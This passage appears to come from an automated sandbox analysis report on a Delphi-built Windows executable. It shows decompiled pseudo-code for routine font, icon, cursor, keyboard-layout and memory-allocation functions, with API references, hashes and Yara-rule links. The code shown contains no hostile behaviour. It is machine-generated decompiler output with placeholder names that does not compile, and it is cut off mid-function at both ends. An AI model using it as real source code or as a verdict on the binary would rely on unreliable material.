					_v5 =  *((intOrPtr*)(_t54 + 0x88));
				}
				_push(_t74);
				_push(0x456f15);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x48fbfc != 0) {
					_t52 =  *0x48fbfc; // 0x2131310
					E004591E4(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E0041F188( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E0041F188( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0x94000000
					E0041F26C( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E0041F188( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0x94000000
					E0041F188( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E0041F188( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0x94000000
				E0041EFCC( *_t16, 0x80000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E0041EFCC( *_t17, 0x80000007);
				 *[fs:eax] = 0x80000007;
				_push(0x456f1c);
				if( *0x48fbfc != 0) {
					_t38 =  *0x48fbfc; // 0x2131310
					return E004591E4(_t38, _v5);
				}
				return 0;
			}

0x00456dd0
0x00456dd1
0x00456dd3
0x00456dda
0x00456ddc
0x00456de7
0x00456de9
0x00456df4
0x00456df4
0x00456df9
0x00456dfa
0x00456dff
0x00456e02
0x00456e0c
0x00456e10
0x00456e15
0x00456e15
0x00456e2b
0x00456e47
0x00456e4e
0x00456e54
0x00456e2d
0x00456e31
0x00456e38
0x00456e3e
0x00456e3e
0x00456e59
0x00456e70
0x00456e77
0x00456ead
0x00456eb8
0x00456ebf
0x00456ec6
0x00456ecc
0x00456e79
0x00456e80
0x00456e87
0x00456e8d
0x00456e99
0x00456ea0
0x00456ea6
0x00456ea6
0x00456ed1
0x00456edc
0x00456ee1
0x00456eec
0x00456ef6
0x00456ef9
0x00456f05
0x00456f0a
0x00000000
0x00456f0f
0x00456f14

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 00456E24
CreateFontIndirectA.GDI32(?), ref: 00456E31
GetStockObject.GDI32(0000000D), ref: 00456E47

Part of subcall function 0041F26C: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041F279

SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00456E70
CreateFontIndirectA.GDI32(?), ref: 00456E80
CreateFontIndirectA.GDI32(?), ref: 00456E99
GetStockObject.GDI32(0000000D), ref: 00456EBF

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFontIndirect$InfoObjectParametersStockSystem
String ID:
API String ID: 2891467149-0
Opcode ID: 47e6a2a5273aab672d0d263ed654e8c02f208c43855a048955b84f40bc6cb5b9
Instruction ID: 22455cef2fa3044bae6d6303f9818bc19750aebba8a6dec4bd026751b0e5dc34
Opcode Fuzzy Hash: 47e6a2a5273aab672d0d263ed654e8c02f208c43855a048955b84f40bc6cb5b9
Instruction Fuzzy Hash: 8B31C870744205ABD750EB69DC42BD937A4AB44304F91807ABD08EB2D7DE789D4ECB29

Uniqueness

Uniqueness Score: -1.00%

Function 004576D8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E004576D8(void* __ecx, char __edx) {
				char _v5;
				char _v261;
				void* __ebx;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HINSTANCE__** _t53;
				struct HICON__* _t55;
				intOrPtr _t58;
				struct HINSTANCE__** _t60;
				void* _t67;
				char* _t69;
				char* _t75;
				intOrPtr _t81;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				char _t93;
				void* _t104;
				void* _t105;

				_t93 = __edx;
				_t91 = __ecx;
				if(__edx != 0) {
					_t105 = _t105 + 0xfffffff0;
					_t39 = E00403918(_t39, _t104);
				}
				_v5 = _t93;
				_t90 = _t39;
				E0041BD2C(_t91, 0);
				_t42 =  *0x48e664; // 0x471468
				if( *((short*)(_t42 + 2)) == 0) {
					_t89 =  *0x48e664; // 0x471468
					 *((intOrPtr*)(_t89 + 4)) = _t90;
					 *_t89 = 0x458d0c;
				}
				_t43 =  *0x48e704; // 0x471470
				_t109 =  *((short*)(_t43 + 2));
				if( *((short*)(_t43 + 2)) == 0) {
					_t88 =  *0x48e704; // 0x471470
					 *((intOrPtr*)(_t88 + 4)) = _t90;
					 *_t88 = E00458F04;
				}
				 *((char*)(_t90 + 0x34)) = 0;
				 *((intOrPtr*)(_t90 + 0x90)) = E00403584(1);
				 *((intOrPtr*)(_t90 + 0xa8)) = E00403584(1);
				 *((intOrPtr*)(_t90 + 0x60)) = 0;
				 *((intOrPtr*)(_t90 + 0x84)) = 0;
				 *((intOrPtr*)(_t90 + 0x5c)) = 0x80000018;
				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
				 *((char*)(_t90 + 0x7c)) = 1;
				 *((intOrPtr*)(_t90 + 0x80)) = 0;
				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
				 *((char*)(_t90 + 0x88)) = 0;
				 *((char*)(_t90 + 0x9d)) = 1;
				 *((char*)(_t90 + 0xb4)) = 1;
				_t103 = E00425B40(1);
				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
				_t53 =  *0x48e598; // 0x48f02c
				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
				E00425F10(_t103, _t55);
				_t20 = _t90 + 0x98; // 0x736d
				_t58 =  *_t20;
				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
				 *((intOrPtr*)(_t58 + 0x10)) = 0x459474;
				_t60 =  *0x48e598; // 0x48f02c
				GetModuleFileNameA( *_t60,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t67 = E0040AC88(0x5c, _t109);
				_t110 = _t67;
				if(_t67 != 0) {
					_t27 = _t67 + 1; // 0x1
					E00408BB4( &_v261, _t27);
				}
				_t69 = E0040ACB0( &_v261, 0x2e, _t110);
				if(_t69 != 0) {
					 *_t69 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t31 = _t90 + 0x8c; // 0x44fbf8
				E00404588(_t31, 0x100,  &_v261);
				_t75 =  *0x48e480; // 0x48f034
				if( *_t75 == 0) {
					E004579E0(_t90, _t90, 0x100); // executed
				}
				 *((char*)(_t90 + 0x59)) = 1;
				 *((char*)(_t90 + 0x5a)) = 1;
				 *((char*)(_t90 + 0x5b)) = 1;
				 *((char*)(_t90 + 0x9e)) = 1;
				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
				E00459650(_t90, 0x100);
				E00459F90(_t90);
				_t81 = _t90;
				if(_v5 != 0) {
					E00403970(_t81);
					_pop( *[fs:0x0]);
				}
				return _t90;
			}

0x004576d8
0x004576d8
0x004576e5
0x004576e7
0x004576ea
0x004576ea
0x004576ef
0x004576f2
0x004576f8
0x004576fd
0x00457707
0x00457709
0x0045770e
0x00457711
0x00457711
0x00457717
0x0045771c
0x00457721
0x00457723
0x00457728
0x0045772b
0x0045772b
0x00457731
0x00457741
0x00457753
0x0045775b
0x00457760
0x00457766
0x0045776d
0x00457774
0x0045777a
0x00457780
0x00457787
0x0045778e
0x00457795
0x004577a8
0x004577aa
0x004577b5
0x004577bd
0x004577c6
0x004577cb
0x004577cb
0x004577d1
0x004577d4
0x004577e7
0x004577ef
0x00457802
0x0045780f
0x00457814
0x00457816
0x00457818
0x00457821
0x00457821
0x0045782e
0x00457835
0x00457837
0x00457837
0x00457842
0x00457847
0x00457858
0x0045785d
0x00457865
0x00457869
0x00457869
0x0045786e
0x00457872
0x00457876
0x0045787a
0x00457883
0x0045788b
0x00457892
0x00457897
0x0045789d
0x0045789f
0x004578a4
0x004578ab
0x004578b5

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 004577BD
GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,0044412C,00000000,00000000,?,00000000,?,00000000,00444194), ref: 004577EF
OemToCharA.USER32 ref: 00457802
CharLowerA.USER32(?,?,?,00400000,?,00000100,?,?,?,0044412C,00000000,00000000,?,00000000,?,00000000), ref: 00457842

Strings

MAINICON, xrefs: 004577B0

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$FileIconLoadLowerModuleName
String ID: MAINICON
API String ID: 3935243913-2283262055
Opcode ID: 3afd552d7edde93b84cccd1aa0bd78bbeee23eced089067980efc106cb9a2896
Instruction ID: f91650c1e48c6a7b71da3cdc9bf6eb6dac7f936d21e52dda7fdd992b64cca578
Opcode Fuzzy Hash: 3afd552d7edde93b84cccd1aa0bd78bbeee23eced089067980efc106cb9a2896
Instruction Fuzzy Hash: B25140706042449FDB40EF29D885B897BE4AB15308F4444FAEC48DF397D7B99988CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004565F4, Relevance: 6.1, APIs: 4, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004565F4(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr _t42;
				intOrPtr* _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				void* _t63;
				char _t64;
				void* _t74;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				_t74 = __edi;
				_t64 = __edx;
				if(__edx != 0) {
					_t77 = _t77 + 0xfffffff0;
					_t25 = E00403918(_t25, _t76);
				}
				_v5 = _t64;
				_t62 = _t25;
				E0041BD2C(_t63, 0);
				_t28 =  *0x48e538; // 0x471458
				 *((intOrPtr*)(_t28 + 4)) = _t62;
				 *_t28 = 0x456998;
				_t29 =  *0x48e544; // 0x471460
				 *((intOrPtr*)(_t29 + 4)) = _t62;
				 *_t29 = 0x4569a4;
				E004569B0(_t62);
				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t62 + 0x4c)) = E00403584(1);
				 *((intOrPtr*)(_t62 + 0x50)) = E00403584(1);
				 *((intOrPtr*)(_t62 + 0x54)) = E00403584(1);
				 *((intOrPtr*)(_t62 + 0x58)) = E00403584(1);
				_t42 = E00403584(1);
				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
				L00406E30();
				_t75 = _t42;
				L00406B00();
				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
				L00407090();
				_t11 = _t62 + 0x58; // 0x44fa946e
				_t45 =  *0x48e674; // 0x48fab0
				 *((intOrPtr*)( *_t45))(0, 0, E00452E78,  *_t11, 0, _t75, _t75, 0x5a, 0);
				 *((intOrPtr*)(_t62 + 0x84)) = E0041EDF8(1);
				 *((intOrPtr*)(_t62 + 0x88)) = E0041EDF8(1);
				 *((intOrPtr*)(_t62 + 0x80)) = E0041EDF8(1);
				E00456DD0(_t62, _t62, _t63, _t74);
				_t15 = _t62 + 0x84; // 0x38004010
				_t56 =  *_t15;
				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
				 *((intOrPtr*)(_t56 + 8)) = 0x456cac;
				_t18 = _t62 + 0x88; // 0x90000000
				_t57 =  *_t18;
				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
				 *((intOrPtr*)(_t57 + 8)) = 0x456cac;
				_t21 = _t62 + 0x80; // 0x94000000
				_t58 =  *_t21;
				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
				 *((intOrPtr*)(_t58 + 8)) = 0x456cac;
				_t59 = _t62;
				if(_v5 != 0) {
					E00403970(_t59);
					_pop( *[fs:0x0]);
				}
				return _t62;
			}

0x004565f4
0x004565f4
0x004565fc
0x004565fe
0x00456601
0x00456601
0x00456606
0x00456609
0x0045660f
0x00456614
0x00456619
0x0045661c
0x00456622
0x00456627
0x0045662a
0x00456632
0x0045663e
0x0045664d
0x0045665c
0x0045666b
0x0045667a
0x00456684
0x00456689
0x0045668e
0x00456693
0x00456698
0x0045669d
0x004566a3
0x004566a8
0x004566b6
0x004566bd
0x004566cb
0x004566dd
0x004566ef
0x004566f7
0x004566fc
0x004566fc
0x00456702
0x00456705
0x0045670c
0x0045670c
0x00456712
0x00456715
0x0045671c
0x0045671c
0x00456722
0x00456725
0x0045672c
0x00456732
0x00456734
0x00456739
0x00456740
0x00456749

APIs

GetKeyboardLayout.USER32 ref: 00456639
7378AC50.USER32(00000000,00000000,?,?,00000000,?,00444116,00000000,00000000,?,00000000,?,00000000,00444194), ref: 0045668E
7378AD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,00444116,00000000,00000000,?,00000000,?,00000000,00444194), ref: 00456698
7378B380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,00444116,00000000,00000000,?,00000000,?), ref: 004566A3

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7378$B380KeyboardLayout
String ID:
API String ID: 1139801820-0
Opcode ID: 09d097c13d2e8ad1a3610dbe109d193eb6ad8e50cf5b8cf7c071f3cb8be01b42
Instruction ID: 9a5b49912678ea6d712e030840aa341b4aed046541f6b317ff7e9cc4908e3459
Opcode Fuzzy Hash: 09d097c13d2e8ad1a3610dbe109d193eb6ad8e50cf5b8cf7c071f3cb8be01b42
Instruction Fuzzy Hash: 493118B06002419FD740EF2AD885B897BE5AF14319F45807AED08DF3A2D6799848CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401A78, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401A78() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401B2E);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x48f5c4);
				L004013CC();
				if( *0x48f049 != 0) {
					_push(0x48f5c4);
					L004013D4();
				}
				E0040143C(0x48f5e4);
				E0040143C(0x48f5f4);
				E0040143C(0x48f620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x48f61c = _t11;
				if( *0x48f61c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x48f61c; // 0x51f798
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x48f608)) = 0x48f604;
					 *0x48f604 = 0x48f604;
					 *0x48f610 = 0x48f604;
					 *0x48f5bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401B35);
				if( *0x48f049 != 0) {
					_push(0x48f5c4);
					L004013DC();
					return 0;
				}
				return 0;
			}

0x00401a7d
0x00401a7e
0x00401a83
0x00401a86
0x00401a89
0x00401a8e
0x00401a9a
0x00401a9c
0x00401aa1
0x00401aa1
0x00401aab
0x00401ab5
0x00401abf
0x00401acb
0x00401ad0
0x00401adc
0x00401ade
0x00401ae3
0x00401ae3
0x00401aeb
0x00401aef
0x00401af0
0x00401afc
0x00401aff
0x00401b01
0x00401b06
0x00401b06
0x00401b0f
0x00401b12
0x00401b15
0x00401b21
0x00401b23
0x00401b28
0x00000000
0x00401b28
0x00401b2d

APIs

RtlInitializeCriticalSection.KERNEL32(0048F5C4,00000000,00401B2E,?,?,00402312,0048F604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401A8E
RtlEnterCriticalSection.KERNEL32(0048F5C4,0048F5C4,00000000,00401B2E,?,?,00402312,0048F604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401AA1
LocalAlloc.KERNEL32(00000000,00000FF8,0048F5C4,00000000,00401B2E,?,?,00402312,0048F604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401ACB
RtlLeaveCriticalSection.KERNEL32(0048F5C4,00401B35,00000000,00401B2E,?,?,00402312,0048F604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401B28

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: a9421c50b1c25fc8bfbbbfaf9629a50131ce816a9e0b5b930daf26e2f6b34203
Instruction ID: dc321342bc449cc15bb6ac2eae4965e175d76143ccaee218c8dc981e641ee4e5
Opcode Fuzzy Hash: a9421c50b1c25fc8bfbbbfaf9629a50131ce816a9e0b5b930daf26e2f6b34203
Instruction Fuzzy Hash: 0601ADB0A042406EE715BFAAA806B1D7AD0D749304F50883FE000F66F3E7BC445ACB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00426A8C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00426A8C(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x48fabc == 0) {
					 *0x48fa94 = E004269A4(0, _t8,  *0x48fa94, _t17, _t18);
					_t7 =  *0x48fa94(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}

0x00426a90
0x00426a9a
0x00426aae
0x00426ab4
0x00000000
0x00426ab4
0x00426abc
0x00426ac4
0x00426ac4
0x00426ac7
0x00426adb
0x00426ac9
0x00426ac9
0x00426adf
0x00426acb
0x00426acb
0x00426acb
0x00426acc
0x00426ae3
0x00426ace
0x00426acf
0x00426ad2
0x00426ad4
0x00426ad4
0x00426ad2
0x00426acc
0x00426ac9
0x00426ae8
0x00426aeb
0x00426af5
0x00426aed
0x00000000
0x00426aee

APIs

GetSystemMetrics.USER32 ref: 00426AEE

Part of subcall function 004269A4: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00426A24

KiUserCallbackDispatcher.NTDLL ref: 00426AB4

Strings

GetSystemMetrics, xrefs: 00426A9C

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCallbackDispatcherMetricsProcSystemUser
String ID: GetSystemMetrics
API String ID: 54681038-96882338
Opcode ID: f85df037eac8666acdef31861146caafc0f08f6d46f15898e948c7cd1ce4f54c
Instruction ID: 22a65f47129e67c00ee194768dcff261046473d558685a6e18173ebbc9bd789b
Opcode Fuzzy Hash: f85df037eac8666acdef31861146caafc0f08f6d46f15898e948c7cd1ce4f54c
Instruction Fuzzy Hash: 4AF0F0303241714ADF004A34BD806273A49A783330FE2CA3BE926AAAD0C6BDCC45C35E

Uniqueness

Uniqueness Score: -1.00%

Function 00402164, Relevance: 3.1, APIs: 2, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 00401A78: RtlInitializeCriticalSection.KERNEL32(0048F5C4,00000000,00401B2E,?,?,00402312,0048F604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401A8E
Part of subcall function 00401A78: RtlEnterCriticalSection.KERNEL32(0048F5C4,0048F5C4,00000000,00401B2E,?,?,00402312,0048F604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401AA1
Part of subcall function 00401A78: LocalAlloc.KERNEL32(00000000,00000FF8,0048F5C4,00000000,00401B2E,?,?,00402312,0048F604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401ACB
Part of subcall function 00401A78: RtlLeaveCriticalSection.KERNEL32(0048F5C4,00401B35,00000000,00401B2E,?,?,00402312,0048F604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401B28

RtlEnterCriticalSection.KERNEL32(0048F5C4,00000000,004022E0), ref: 004021AF
RtlLeaveCriticalSection.KERNEL32(0048F5C4,004022E7), ref: 004022DA

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID:
API String ID: 2227675388-0
Opcode ID: 7115dbca6965dd4d7ad70399d23df8d5d88d45a4b7b3bb23bc84f602b0167d13
Instruction ID: d987da5912d98529dea970c121a90ca755c544ff81432407de5aa6ed45f2cd0f
Opcode Fuzzy Hash: 7115dbca6965dd4d7ad70399d23df8d5d88d45a4b7b3bb23bc84f602b0167d13
Instruction Fuzzy Hash: EA41E4B2A04200DFD714CFA9EE8562DB7A0EB55318B2446BFD401E77E1E3789946CB4C

Uniqueness

Uniqueness Score: -1.00%

Function 004569B0, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004569B0(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffea;
				_t12 = 0x471bb4;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						if(_t8 != 0xffffffeb) {
							_t11 = 0;
						} else {
							goto L4;
						}
					} else {
						L4:
						_t11 =  *0x48f714; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E00456A68(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}

0x004569b4
0x004569c2
0x004569c5
0x004569ca
0x004569cf
0x004569d2
0x004569dc
0x004569e6
0x00000000
0x00000000
0x00000000
0x004569de
0x004569de
0x004569de
0x004569de
0x004569ec
0x004569f7
0x004569fc
0x004569fd
0x00456a00
0x00456a09

APIs

LoadCursorA.USER32 ref: 004569BD
LoadCursorA.USER32 ref: 004569EC

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorLoad
String ID:
API String ID: 3238433803-0
Opcode ID: d6de00b65071e09e2690aaf7b03e08efc0fb2c24a8d0773775e60b849ccbb120
Instruction ID: a68e30bfcb635300f7ac1b644cbf0b244a91819071521e29b99e579d6b5154fd
Opcode Fuzzy Hash: d6de00b65071e09e2690aaf7b03e08efc0fb2c24a8d0773775e60b849ccbb120
Instruction Fuzzy Hash: 03F08261A00254179660163E5CD1A6B72589F82336B62033FFD2AD72E3DA395C499269

Uniqueness

Uniqueness Score: -1.00%

Function 00401590, Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401590(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401444(0x48f5e4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

0x00401593
0x0040159d
0x004015ac
0x0040159f
0x0040159f
0x0040159f
0x004015b2
0x004015bf
0x004015c4
0x004015c6
0x004015ca
0x004015d3
0x004015da
0x004015e6
0x004015ed
0x00000000
0x004015ed
0x004015da
0x004015f2

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401899), ref: 004015BF
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401899), ref: 004015E6

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 514d9c6073d95a7fd889d2da4666c4dab7fb463a216ba28fc7f0d49a2089cc71
Instruction ID: fe368054362886feb3db4b393798dcf367e510bfad46e737d7199c7e75bcba1b
Opcode Fuzzy Hash: 514d9c6073d95a7fd889d2da4666c4dab7fb463a216ba28fc7f0d49a2089cc71
Instruction Fuzzy Hash: 71F02772F002202BEB20696A4CC1F4366C59FC5790F180177FA08FF3E9D6798C0043A9

Uniqueness

Uniqueness Score: -1.00%

Function 004703F8, Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004703F8(void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				long _v8;
				void* __ebx;
				void* __ecx;
				signed int _t22;
				signed int _t29;
				intOrPtr* _t31;

				_t31 = _a4;
